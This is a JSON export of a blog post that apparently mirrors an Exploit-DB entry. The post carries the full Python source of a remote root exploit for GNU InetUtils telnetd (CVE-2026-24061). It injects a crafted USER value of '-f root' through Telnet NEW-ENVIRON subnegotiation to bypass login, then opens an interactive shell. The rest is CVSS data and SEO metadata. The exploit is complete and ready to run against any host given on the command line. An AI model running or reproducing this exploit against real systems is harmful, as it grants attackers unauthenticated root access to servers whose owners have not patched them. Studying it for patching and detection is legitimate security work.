{"id":50119,"date":"2026-04-29T06:41:56","date_gmt":"2026-04-29T06:41:56","guid":{"rendered":"http:\/\/localhost\/?p=50119"},"modified":"2026-04-29T06:41:56","modified_gmt":"2026-04-29T06:41:56","slug":"gnu-inetutils-26-telnetd-remote-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50119","title":{"rendered":"GNU InetUtils 2.6 &#8211; Telnetd Remote Privilege Escalation_EDB-ID:52524"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-29T11:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: GNU InetUtils telnetd &#8211; Remote Privilege Escalation Date: 2026-01-24 Exploit Author: Ali Guliyev infat0x Author GitHub: https:\/\/github.com\/infat0x Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link:&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;GNU InetUtils 2.6 &#8211; Telnetd Remote Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52524&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24061&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: GNU InetUtils telnetd &#8211; Remote Privilege Escalation \\r\\n# Date: 2026-01-24\\r\\n# Exploit Author: Ali Guliyev (infat0x)\\r\\n# Author GitHub: https:\/\/github.com\/infat0x\\r\\n# Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/\\r\\n# Software Link: https:\/\/ftp.gnu.org\/gnu\/inetutils\/\\r\\n# Version: GNU InetUtils 2.0 through 2.6\\r\\n# Tested on: Linux (various distributions using vulnerable inetutils-telnetd)\\r\\n# CVE : CVE-2026-24061\\r\\n\\r\\nimport socket\\r\\nimport sys\\r\\nimport threading\\r\\nimport argparse\\r\\nimport re\\r\\n\\r\\n\\&#8221;\\&#8221;\\&#8221;\\r\\nDescription:\\r\\nThe telnetd implementation in GNU InetUtils before 2.7-2 is vulnerable to \\r\\nauthentication bypass via environment variable injection. By passing a \\r\\ncrafted USER environment variable (e.g., \\&#8221;-f root\\&#8221;) during the Telnet \\r\\nNEW-ENVIRON subnegotiation, an attacker can force the login process \\r\\nto grant a root shell without requiring a password.\\r\\n\\r\\nTechnical Analysis:\\r\\nThe vulnerability exists because telnetd fails to sanitize the USER variable \\r\\nbefore passing it as an argument to \/bin\/login. By prepending the -f flag, \\r\\nthe login utility skips the authentication phase.\\r\\n\\&#8221;\\&#8221;\\&#8221;\\r\\n\\r\\n# Telnet Protocol Constants (RFC 854)\\r\\nIAC  = 255  # Interpret As Command\\r\\nDONT = 254\\r\\nDO   = 253\\r\\nWONT = 252\\r\\nWILL = 251\\r\\nSB   = 250  # Subnegotiation Begin\\r\\nSE   = 240  # Subnegotiation End\\r\\n\\r\\n# Telnet Option Codes (RFC 1572)\\r\\nNEW_ENVIRON = 39 \\r\\nIS    = 0\\r\\nVAR   = 0\\r\\nVALUE = 1\\r\\n\\r\\ndef handle_negotiation(sock, cmd, opt):\\r\\n    \\&#8221;\\&#8221;\\&#8221;Responds to standard Telnet negotiation sequences.\\&#8221;\\&#8221;\\&#8221;\\r\\n    if cmd == DO and opt == NEW_ENVIRON:\\r\\n        # Agreement to use the environment variable passing option\\r\\n        sock.sendall(bytes([IAC, WILL, NEW_ENVIRON]))\\r\\n    elif cmd == DO:\\r\\n        # Refuse other options for simplicity\\r\\n        sock.sendall(bytes([IAC, WONT, opt]))\\r\\n    elif cmd == WILL:\\r\\n        # Acknowledge the server&#8217;s willingness\\r\\n        sock.sendall(bytes([IAC, DO, opt]))\\r\\n\\r\\ndef handle_subnegotiation(sock, sb_data, user_payload):\\r\\n    \\&#8221;\\&#8221;\\&#8221;Executes the core exploit by injecting the malformed USER variable.\\&#8221;\\&#8221;\\&#8221;\\r\\n    if len(sb_data) \\u003e 0 and sb_data[0] == NEW_ENVIRON:\\r\\n        # Format: IAC SB NEW_ENVIRON IS VAR \\&#8221;USER\\&#8221; VALUE \\&#8221;-f root\\&#8221; IAC SE\\r\\n        env_msg = (\\r\\n            bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + \\r\\n            b&#8217;USER&#8217; + \\r\\n            bytes([VALUE]) + \\r\\n            user_payload.encode(&#8216;ascii&#8217;) + \\r\\n            bytes([IAC, SE])\\r\\n        )\\r\\n        sock.sendall(env_msg)\\r\\n\\r\\ndef process_telnet_stream(data, sock, user_payload):\\r\\n    \\&#8221;\\&#8221;\\&#8221;Parses incoming data to separate control signals from actual text.\\&#8221;\\&#8221;\\&#8221;\\r\\n    clean_output = b&#8221;\\r\\n    i = 0\\r\\n    while i \\u003c len(data):\\r\\n        if data[i] == IAC and i + 1 \\u003c len(data):\\r\\n            cmd = data[i + 1]\\r\\n            if cmd in [DO, DONT, WILL, WONT] and i + 2 \\u003c len(data):\\r\\n                handle_negotiation(sock, cmd, data[i + 2])\\r\\n                i += 3\\r\\n            elif cmd == SB:\\r\\n                se_idx = i + 2\\r\\n                while se_idx \\u003c len(data) &#8211; 1:\\r\\n                    if data[se_idx] == IAC and data[se_idx + 1] == SE:\\r\\n                        break\\r\\n                    se_idx += 1\\r\\n                if se_idx \\u003c len(data) &#8211; 1:\\r\\n                    handle_subnegotiation(sock, data[i + 2:se_idx], user_payload)\\r\\n                    i = se_idx + 2\\r\\n                else:\\r\\n                    i += 1\\r\\n            else:\\r\\n                i += 2\\r\\n        else:\\r\\n            clean_output += bytes([data[i]])\\r\\n            i += 1\\r\\n\\r\\n    # Filter ANSI escape sequences for a cleaner shell experience\\r\\n    ansi_escape = re.compile(rb&#8217;\\\\x1b\\\\[[0-?]*[ -\/]*[@-~]&#8217;)\\r\\n    return ansi_escape.sub(b&#8221;, clean_output)\\r\\n\\r\\ndef socket_reader_thread(sock, user_payload):\\r\\n    \\&#8221;\\&#8221;\\&#8221;Background thread to handle server output.\\&#8221;\\&#8221;\\&#8221;\\r\\n    try:\\r\\n        while True:\\r\\n            raw_data = sock.recv(4096)\\r\\n            if not raw_data:\\r\\n                break\\r\\n            display_data = process_telnet_stream(raw_data, sock, user_payload)\\r\\n            if display_data:\\r\\n                sys.stdout.buffer.write(display_data)\\r\\n                sys.stdout.buffer.flush()\\r\\n    except (ConnectionResetError, BrokenPipeError):\\r\\n        pass\\r\\n    finally:\\r\\n        print(\\&#8221;\\\\n[*] Connection closed.\\&#8221;)\\r\\n\\r\\ndef main():\\r\\n    parser = argparse.ArgumentParser(description=\\&#8221;CVE-2026-24061 Exploitation Tool\\&#8221;)\\r\\n    parser.add_argument(&#8216;host&#8217;, help=\\&#8221;Target IP address\\&#8221;)\\r\\n    parser.add_argument(&#8216;-p&#8217;, &#8216;&#8211;port&#8217;, type=int, default=23, help=\\&#8221;Telnet port (default 23)\\&#8221;)\\r\\n    args = parser.parse_args()\\r\\n\\r\\n    # The exploit payload to bypass login\\r\\n    user_payload = \\&#8221;-f root\\&#8221;\\r\\n    \\r\\n    try:\\r\\n        client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\r\\n        client_sock.settimeout(5)\\r\\n        client_sock.connect((args.host, args.port))\\r\\n        client_sock.settimeout(None)\\r\\n        print(f\\&#8221;[*] Connected to {args.host}:{args.port}\\&#8221;)\\r\\n        print(f\\&#8221;[*] Sending payload: {user_payload}\\&#8221;)\\r\\n    except Exception as e:\\r\\n        print(f\\&#8221;[!] Connection failed: {e}\\&#8221;)\\r\\n        sys.exit(1)\\r\\n\\r\\n    # Launch output listener\\r\\n    threading.Thread(target=socket_reader_thread, args=(client_sock, user_payload), daemon=True).start()\\r\\n\\r\\n    print(\\&#8221;[*] Interactive session started. Type commands below.\\\\n\\&#8221;)\\r\\n    try:\\r\\n        while True:\\r\\n            # Simple interactive shell loop\\r\\n            char = sys.stdin.read(1)\\r\\n            if not char:\\r\\n                break\\r\\n            client_sock.sendall(char.encode())\\r\\n    except KeyboardInterrupt:\\r\\n        print(\\&#8221;\\\\n[*] Exploit session terminated by user.\\&#8221;)\\r\\n    finally:\\r\\n        client_sock.close()\\r\\n\\r\\nif __name__ == \\&#8221;__main__\\&#8221;:\\r\\n    main()&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.exploit-db.com\/raw\/52524&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.exploit-db.com\/exploits\/52524&#8243;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-29T11:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: GNU InetUtils telnetd &#8211; Remote Privilege Escalation Date: 2026-01-24 Exploit Author: Ali Guliyev infat0x Author GitHub: https:\/\/github.com\/infat0x Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link:&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;GNU InetUtils&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-50119","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation_EDB-ID:52524 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50119\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation_EDB-ID:52524 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-29T11:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: GNU InetUtils telnetd &#8211; Remote Privilege Escalation Date: 2026-01-24 Exploit Author: Ali Guliyev infat0x Author GitHub: https:\/\/github.com\/infat0x Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link:&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;GNU InetUtils...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50119\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T06:41:56+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50119#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50119\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"GNU InetUtils 2.6 &#8211; Telnetd Remote Privilege Escalation_EDB-ID:52524\",\"datePublished\":\"2026-04-29T06:41:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50119\"},\"wordCount\":1099,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"exploitdb\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50119#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50119\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50119\",\"name\":\"GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation_EDB-ID:52524 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-29T06:41:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50119#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50119\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50119#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"GNU InetUtils 2.6 &#8211; Telnetd Remote Privilege Escalation_EDB-ID:52524\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation_EDB-ID:52524 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=50119","og_locale":"en_US","og_type":"article","og_title":"GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation_EDB-ID:52524 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-29T11:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: GNU InetUtils telnetd &#8211; Remote Privilege Escalation Date: 2026-01-24 Exploit Author: Ali Guliyev infat0x Author GitHub: https:\/\/github.com\/infat0x Vendor Homepage: https:\/\/www.gnu.org\/software\/inetutils\/ Software Link:&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;GNU InetUtils...","og_url":"https:\/\/zero.redgem.net\/?p=50119","og_site_name":"zero redgem","article_published_time":"2026-04-29T06:41:56+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=50119#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=50119"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"GNU InetUtils 2.6 &#8211; Telnetd Remote Privilege Escalation_EDB-ID:52524","datePublished":"2026-04-29T06:41:56+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=50119"},"wordCount":1099,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=50119#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=50119","url":"https:\/\/zero.redgem.net\/?p=50119","name":"GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation_EDB-ID:52524 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-29T06:41:56+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=50119#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=50119"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=50119#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"GNU InetUtils 2.6 &#8211; Telnetd Remote Privilege Escalation_EDB-ID:52524"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50119","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=50119"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/50119\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=50119"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=50119"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=50119"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}